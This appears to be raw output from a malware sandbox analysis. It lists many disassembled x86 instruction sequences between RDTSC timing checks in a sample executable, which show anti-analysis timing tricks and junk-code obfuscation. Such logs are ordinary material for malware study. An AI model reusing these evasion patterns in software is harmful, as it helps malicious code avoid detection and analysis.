Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110FB48 second address: 110FB61 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD2CC8277E6h 0x00000008 jmp 00007FD2CC8277EFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110FB61 second address: 110FB66 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110FE27 second address: 110FE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2CC8277F2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110FE3D second address: 110FE6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08505h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD2CCE084FCh 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110FE6E second address: 110FE89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FD2CC8277E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110FE89 second address: 110FE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110FFE7 second address: 110FFEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110FFEB second address: 1110003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 jmp 00007FD2CCE084FCh 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1110003 second address: 1110044 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CC8277EAh 0x00000008 jmp 00007FD2CC8277F7h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 push eax 0x0000001a jnl 00007FD2CC8277E6h 0x00000020 jo 00007FD2CC8277E6h 0x00000026 pop eax 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111044B second address: 1110465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 je 00007FD2CCE084FEh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1110465 second address: 111046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1116C31 second address: 1116C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD2CCE084FFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1116C4B second address: 1116C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FD2CC8277E6h 0x0000000a jmp 00007FD2CC8277EEh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1115700 second address: 1115706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1115706 second address: 1115748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FD2CC8277EFh 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD2CC8277F8h 0x00000011 popad 0x00000012 jns 00007FD2CC8277E8h 0x00000018 popad 0x00000019 jo 00007FD2CC827816h 0x0000001f push eax 0x00000020 push edx 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1115748 second address: 111574C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1115E9C second address: 1115EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jmp 00007FD2CC8277F2h 0x0000000b jmp 00007FD2CC8277EEh 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 push edi 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1116039 second address: 111603D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11166FB second address: 1116703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111C6E5 second address: 111C6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a jo 00007FD2CCE084F6h 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111C6F8 second address: 111C71B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2CC8277FDh 0x00000008 jmp 00007FD2CC8277F7h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111B59F second address: 111B5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111B718 second address: 111B731 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FD2CC8277F4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111BB73 second address: 111BBA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CCE084FFh 0x00000008 jmp 00007FD2CCE08509h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111BBA0 second address: 111BBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD2CC8277ECh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111BBB7 second address: 111BBD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE084FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007FD2CCE084FEh 0x0000000f jc 00007FD2CCE084F6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11231A3 second address: 11231BE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2CC8277E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007FD2CC8277EEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1126661 second address: 112667F instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2CCE084F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD2CCE08501h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EAF22 second address: 10C77DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D3CC3h], edx 0x00000010 call dword ptr [ebp+122D187Ah] 0x00000016 pushad 0x00000017 jmp 00007FD2CC8277F3h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EB027 second address: 10EB032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD2CCE084F6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EB3D7 second address: 10EB3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EB671 second address: 10EB675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EB6D0 second address: 10EB6DA instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD2CC8277ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EB6DA second address: 10EB72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jbe 00007FD2CCE08502h 0x0000000d xchg eax, esi 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD2CCE084F8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 nop 0x00000029 jo 00007FD2CCE08511h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FD2CCE08503h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EB889 second address: 10EB88D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EC0B2 second address: 10EC0B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EC0B7 second address: 10EC0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EC0BD second address: 10EC0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EC0CA second address: 10EC0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EC0CE second address: 10EC0D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EC0D7 second address: 10EC154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007FD2CC8277E8h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 movzx edi, di 0x00000024 lea eax, dword ptr [ebp+1247FC2Ah] 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007FD2CC8277E8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 and edi, 73DBA36Bh 0x0000004a push ebx 0x0000004b mov dword ptr [ebp+122D27CAh], ecx 0x00000051 pop edx 0x00000052 nop 0x00000053 jmp 00007FD2CC8277EDh 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jl 00007FD2CC8277ECh 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EC154 second address: 10EC158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EC158 second address: 10C82A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jnp 00007FD2CC8277E6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FD2CC8277E8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007FD2CC8277F3h 0x0000002e call dword ptr [ebp+122D33BBh] 0x00000034 push ebx 0x00000035 jmp 00007FD2CC8277F0h 0x0000003a je 00007FD2CC8277F2h 0x00000040 jno 00007FD2CC8277E6h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1126AD1 second address: 1126AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD2CCE084F6h 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007FD2CCE084F6h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1126AE9 second address: 1126AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 jng 00007FD2CC8277E6h 0x0000000f jp 00007FD2CC8277E6h 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1127080 second address: 1127087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1127087 second address: 1127097 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD2CC8277E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1127247 second address: 112724C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11273D5 second address: 11273D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1129B2A second address: 1129B4F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD2CCE084FEh 0x00000008 jmp 00007FD2CCE084FDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 112C964 second address: 112C97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FD2CC8277F3h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD2CC8277EBh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 112C97C second address: 112C990 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CCE084FFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 112C55D second address: 112C563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113073D second address: 1130758 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08507h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1130758 second address: 1130766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FD2CC8277ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1130766 second address: 113076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 112FE7A second address: 112FE8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ecx 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113010F second address: 1130113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1130113 second address: 113012B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113012B second address: 1130132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1130132 second address: 1130138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1130138 second address: 113014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jl 00007FD2CCE084F6h 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113014F second address: 1130153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1130153 second address: 113015F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD2CCE084F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113015F second address: 1130189 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277ECh 0x00000007 jnp 00007FD2CC827800h 0x0000000d jmp 00007FD2CC8277F4h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113041B second address: 1130431 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnl 00007FD2CCE084F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FD2CCE084FEh 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1134F7C second address: 1134F80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1134F80 second address: 1134F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1134F8C second address: 1134FA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EAh 0x00000007 ja 00007FD2CC8277E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FD2CC8277ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EBB3B second address: 10EBB3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EBB3F second address: 10EBB88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edx, esi 0x0000000c or dword ptr [ebp+122D38C7h], esi 0x00000012 mov ebx, dword ptr [ebp+1247FC69h] 0x00000018 jmp 00007FD2CC8277F3h 0x0000001d add eax, ebx 0x0000001f nop 0x00000020 pushad 0x00000021 jmp 00007FD2CC8277F2h 0x00000026 jl 00007FD2CC8277ECh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10EBB88 second address: 10EBBCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jnp 00007FD2CCE084FEh 0x0000000c js 00007FD2CCE084F8h 0x00000012 pushad 0x00000013 popad 0x00000014 nop 0x00000015 jc 00007FD2CCE0850Fh 0x0000001b call 00007FD2CCE08508h 0x00000020 pop ecx 0x00000021 push 00000004h 0x00000023 push ecx 0x00000024 mov dword ptr [ebp+122D1BD3h], edi 0x0000002a pop ecx 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f push esi 0x00000030 pop esi 0x00000031 pop ecx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1135244 second address: 1135248 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1135248 second address: 1135256 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113ABA0 second address: 113ABA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113ABA4 second address: 113ABAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1139F62 second address: 1139F71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CC8277EBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1139F71 second address: 1139F8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08508h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A252 second address: 113A258 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A258 second address: 113A27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e jmp 00007FD2CCE084FEh 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A27B second address: 113A281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 113A556 second address: 113A55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
